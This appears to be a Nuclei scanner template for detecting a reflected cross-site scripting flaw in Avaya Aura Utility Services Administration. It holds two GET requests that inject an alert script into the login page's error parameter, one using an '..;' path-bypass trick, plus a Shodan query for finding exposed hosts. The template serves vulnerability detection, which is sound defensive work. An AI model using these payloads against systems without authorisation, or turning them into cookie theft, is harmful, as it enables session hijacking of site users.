id: avaya-aura-xss

info:
  name: Avaya Aura Utility Services Administration - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: Avaya Aura Utility Services Administration contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
    - https://download.avaya.com/css/public/documents/101076366
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"Avaya Aura"
  tags: Avaya-Aura-Utility-Server

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"
      - "{{BaseURL}}/acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
          - 'Avaya Aura Device Services'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100d9c73dea073dbd23f500dbd447cd9c1361f1bbec5040f256bfd2a460f09b122c022049f303ef859586f4cf6fb77ecfca7c5b918dbe60d8c63c5e2b3804e6f7ccad7d:922c64590222798bb761d5b6d8e72950
